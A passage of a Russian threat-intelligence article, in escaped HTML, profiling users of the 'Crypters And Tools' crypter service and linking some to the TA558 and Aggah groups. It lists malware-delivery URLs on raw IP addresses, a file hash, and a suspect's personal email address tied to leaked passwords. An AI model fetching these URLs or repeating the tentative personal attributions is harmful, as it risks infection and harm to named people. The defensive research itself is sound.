\u043e\u0447\u0435\u043d\u044c \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u043c \u0434\u043b\u044f TA558 \u0438\u043c\u0435\u043d\u0435\u043c \u201cProduct Inquiry466789.xls\u201d SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u043b RTF \u0448\u0430\u0431\u043b\u043e\u043d \u0441\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e URL:<\/p>\n<ul>\n<li>\n<p>http:\/\/51.81.235.253\/66166\/hd\/hd.d.d.d.dddd.doC<\/p>\n<\/li>\n<\/ul>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u044f\u0432\u043b\u044f\u043b\u0441\u044f VBS \u0441 \u043e\u0447\u0435\u043d\u044c \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u043c \u0434\u043b\u044f TA558 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c:<\/p>\n<ul>\n<li>\n<p>http:\/\/51.81.235.253\/66166\/catcallingfemalecattogiveflowersgreat.gif<\/p>\n<\/li>\n<\/ul>\n<p>\u041e\u0431\u0430 \u044d\u0442\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0431\u044b\u043b\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u044b \u0432 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 Crypters And Tools:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e4c\/48b\/95c\/e4c48b95ca653863884a35585e1c7584.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Brainiac\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Brainiac\" width=\"596\" height=\"298\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e4c\/48b\/95c\/e4c48b95ca653863884a35585e1c7584.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e4c\/48b\/95c\/e4c48b95ca653863884a35585e1c7584.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.1 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Brainiac<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a40\/0f3\/e95\/a400f3e9545846dfb102e59805d745bf.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Syscore\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Syscore\" width=\"597\" height=\"301\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a40\/0f3\/e95\/a400f3e9545846dfb102e59805d745bf.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a40\/0f3\/e95\/a400f3e9545846dfb102e59805d745bf.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 35.2 \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 Syscore<\/figcaption><\/div>\n<\/figure>\n<p>\u041a\u0430\u043a \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 deadpoolstart2025 \u0438 abbas, \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0431\u044b\u0442\u044c \u0443\u0432\u0435\u0440\u0435\u043d\u044b, \u0447\u0442\u043e \u044d\u0442\u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0442\u043d\u043e\u0441\u044f\u0442\u0441\u044f \u043a \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0435, \u043d\u043e \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u2013 \u044d\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 TA558.<\/p>\n<p>\u0410\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u2013 negrocock:<\/p>\n<ul>\n<li>\n<p>http:\/\/94.156.65.247\/Users_API\/negrocock\/file_mq5uppna.ldt.txt<\/p>\n<\/li>\n<\/ul>\n<p>\u0415\u0433\u043e \u0430\u0442\u0430\u043a\u0438 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0435 \u0434\u043b\u044f TA558 \u043f\u0430\u0442\u0442\u0435\u0440\u043d\u044b:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/198.46.178.144\/morningfiledatinglover.vbs\">http:\/\/198.46.178.144\/morningfiledatinglover.vbs<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/198.46.178.144\/eveningfiledatinglover.vbs<\/p>\n<\/li>\n<\/ul>\n<p><a class=\"anchor\" name=\"7.4\" id=\"7.4\"><\/a><\/p>\n<h3>7.4 KareemHacker<\/h3>\n<p>\u0412 \u0431\u0430\u0437\u0435 CryptersAndTools \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0432\u043e\u0432\u0430\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/388\/92e\/507\/38892e5072ff55d6ba940082cb2e2974.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 36. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 KareemHacker\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 36. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 KareemHacker\" width=\"613\" height=\"296\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/388\/92e\/507\/38892e5072ff55d6ba940082cb2e2974.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/388\/92e\/507\/38892e5072ff55d6ba940082cb2e2974.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 36. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 KareemHacker<\/figcaption><\/div>\n<\/figure>\n<p>KareemHacker \u2013 \u044d\u0442\u043e \u0445\u0430\u043a\u0435\u0440, \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437 \u041c\u0430\u0440\u043e\u043a\u043a\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u0443\u0434\u044f \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0441\u0430\u0439\u0442\u0430 mirror-h (\u0441\u0430\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u043e \u0434\u0435\u0444\u0435\u0439\u0441\u0430\u0445) \u0431\u044b\u043b \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u0435\u043d \u043a \u0434\u0435\u0444\u0435\u0439\u0441\u0443, \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 538 \u0441\u0430\u0439\u0442\u043e\u0432, \u0430 \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c zone-h \u2013 1671. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u0443 \u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u0441\u0432\u043e\u0439 GitHub, X-\u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e Youtube-\u043a\u0430\u043d\u0430\u043b\u043e\u0432, \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043d \u043f\u043e\u0434 \u043c\u0443\u0437\u044b\u043a\u0443 \u043f\u0438\u0448\u0435\u0442 \u0442\u0435\u043a\u0441\u0442 \u043d\u0430 \u0430\u0440\u0430\u0431\u0441\u043a\u043e\u043c \u044f\u0437\u044b\u043a\u0435 \u0438 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0441\u0430\u0439\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u043d \u0437\u0430\u0434\u0435\u0444\u0435\u0439\u0441\u0438\u043b. \u041d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0435\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u0432 \u0441\u043e\u0446\u0441\u0435\u0442\u0438 X \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u0437\u0430 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0430\u0432\u0438\u043b, \u0442.\u043a. \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0436\u0430\u043b\u043e\u0432\u0430\u043b\u0438\u0441\u044c, \u0447\u0442\u043e \u043e\u043d \u0432\u0437\u043b\u043e\u043c\u0430\u043b \u0438\u0445 \u0432\u0435\u0431\u0441\u0430\u0439\u0442.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/683\/25b\/f0c\/68325bf0c94b1831f11fa5d2b47ddb3c.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 37. GitHub \u0430\u043a\u043a\u0430\u0443\u043d\u0442 Kareem Hacker\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 37. GitHub \u0430\u043a\u043a\u0430\u0443\u043d\u0442 Kareem Hacker\" width=\"1037\" height=\"629\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/683\/25b\/f0c\/68325bf0c94b1831f11fa5d2b47ddb3c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/683\/25b\/f0c\/68325bf0c94b1831f11fa5d2b47ddb3c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 37. GitHub \u0430\u043a\u043a\u0430\u0443\u043d\u0442 Kareem Hacker<\/figcaption><\/div>\n<\/figure>\n<p>\u0421\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e Kareem Hacker \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0434\u043a\u043e\u0435, \u043d\u043e \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u043e\u0435 \u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u0435 \u0438\u043c\u0435\u043d\u0438 \u0438 \u0444\u0430\u043c\u0438\u043b\u0438\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435, \u0447\u0442\u043e \u043c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0431\u044b\u0442\u044c \u0443\u0432\u0435\u0440\u0435\u043d\u044b, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c Crypters And Tools \u0438 \u0434\u0435\u0444\u0435\u0439\u0441\u0435\u0440 Kareem.Hacker \u044d\u0442\u043e \u043e\u0434\u0438\u043d \u0447\u0435\u043b\u043e\u0432\u0435\u043a.<\/p>\n<p><a class=\"anchor\" name=\"7.5\" id=\"7.5\"><\/a><\/p>\n<h3>7.5 HeadMaster<\/h3>\n<p>\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Crypters And Tools, \u043c\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0430\u0440\u043a\u0435\u0442\u043f\u043b\u0435\u0439\u0441\u044b, \u0441\u0430\u0439\u0442\u044b \u0438 \u043f\u0440\u043e\u0447\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u0441 \u043f\u0440\u043e\u0434\u0430\u0436\u0430\u043c\u0438 \u044d\u0442\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430. \u041e\u0434\u0438\u043d \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432 \u044d\u0442\u043e \u2013 nitrosoftwares[.]com, \u0433\u0434\u0435 \u043f\u0440\u043e\u0434\u0430\u044e\u0442\u0441\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b, \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u044b, \u043b\u043e\u0433\u0433\u0435\u0440\u044b, \u043a\u0440\u0438\u043f\u0442\u043e\u043a\u043b\u0438\u043f\u043f\u0435\u0440\u044b \u0438 \u0442.\u043f.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d58\/68a\/37f\/d5868a37f228f93bc4628ca5232d98ce.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 38. \u0421\u0430\u0439\u0442 \u0441 \u043f\u0440\u043e\u0434\u0430\u0436\u0435\u0439 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u041f\u041e \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 38. \u0421\u0430\u0439\u0442 \u0441 \u043f\u0440\u043e\u0434\u0430\u0436\u0435\u0439 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u041f\u041e \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432\" width=\"1046\" height=\"834\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d58\/68a\/37f\/d5868a37f228f93bc4628ca5232d98ce.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d58\/68a\/37f\/d5868a37f228f93bc4628ca5232d98ce.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 38. \u0421\u0430\u0439\u0442 \u0441 \u043f\u0440\u043e\u0434\u0430\u0436\u0435\u0439 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u041f\u041e \u0434\u043b\u044f \u0445\u0430\u043a\u0435\u0440\u043e\u0432<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8c6\/6d3\/4cd\/8c66d34cd39a0b56fea72d9d37fe209a.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 39. \u041a\u043e\u043d\u0442\u0430\u043a\u0442\u044b \u043d\u0430 \u0441\u0430\u0439\u0442\u0435\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 39. \u041a\u043e\u043d\u0442\u0430\u043a\u0442\u044b \u043d\u0430 \u0441\u0430\u0439\u0442\u0435\" width=\"645\" height=\"413\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/8c6\/6d3\/4cd\/8c66d34cd39a0b56fea72d9d37fe209a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/8c6\/6d3\/4cd\/8c66d34cd39a0b56fea72d9d37fe209a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 39. \u041a\u043e\u043d\u0442\u0430\u043a\u0442\u044b \u043d\u0430 \u0441\u0430\u0439\u0442\u0435<\/figcaption><\/div>\n<\/figure>\n<p>\u0412 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 Crypters And Tools \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/700\/88d\/114\/70088d114f8a611cbaf4e672e6acd564.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 40. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 headmaster\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 40. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 headmaster\" width=\"601\" height=\"301\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/700\/88d\/114\/70088d114f8a611cbaf4e672e6acd564.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/700\/88d\/114\/70088d114f8a611cbaf4e672e6acd564.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 40. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 headmaster<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u0432\u044f\u0437\u044c \u0434\u0438\u0441\u043a\u043e\u0440\u0434 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 headmaster \u0438 Email jkbest22@gmail.com (\u0440\u0438\u0441 39). \u0412 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0445 \u0443\u0442\u0435\u0447\u043a\u0430\u0445 \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u044d\u0442\u0438\u043c email, \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f headmaster \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 40 (\u0441\u043a\u0440\u044b\u0442 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435).<\/p>\n<p>\u0422\u043e \u0435\u0441\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u043e\u0434\u043d\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u043c\u043d\u043e\u0433\u0438\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u0430\u0445 \u0438 \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u044b\u0448\u0435\u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0439 \u0441\u0430\u0439\u0442 \u0441 \u043f\u0440\u043e\u0434\u0430\u0436\u0435\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u0447\u0430\u0441\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u043e\u0432 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0438\u0441\u044c \u0443\u0442\u0435\u0447\u043a\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0438 \u0435\u043c\u0435\u0439\u043b\u044b, \u043f\u0430\u0440\u043e\u043b\u0438, \u043d\u0438\u043a\u043d\u0435\u0439\u043c\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 IP-\u0430\u0434\u0440\u0435\u0441\u0430, \u0432\u0441\u0435 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0431\u044b\u043b\u0438 \u0438\u0437 \u041f\u0430\u043a\u0438\u0441\u0442\u0430\u043d\u0430 &#8212; \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u044b \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u044b Aggah. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u0443\u044e \u0441\u0432\u044f\u0437\u044c \u043c\u0435\u0436\u0434\u0443 HeadMaster \u0438 Aggah \u043f\u043e\u043a\u0430 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c.<\/p>\n<p><a class=\"anchor\" name=\"7.6\" id=\"7.6\"><\/a><\/p>\n<h3>7.6 \u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438<\/h3>\n<p>\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u2013 HURRICANE.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73c\/5f1\/41a\/73c5f141a4b97f88425b7338324a6b9a.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 41. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 HURRICANE\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 41. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 HURRICANE\" width=\"605\" height=\"292\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/73c\/5f1\/41a\/73c5f141a4b97f88425b7338324a6b9a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73c\/5f1\/41a\/73c5f141a4b97f88425b7338324a6b9a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 41. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 HURRICANE<\/figcaption><\/div>\n<\/figure>\n<p>\u042d\u0442\u043e\u0442 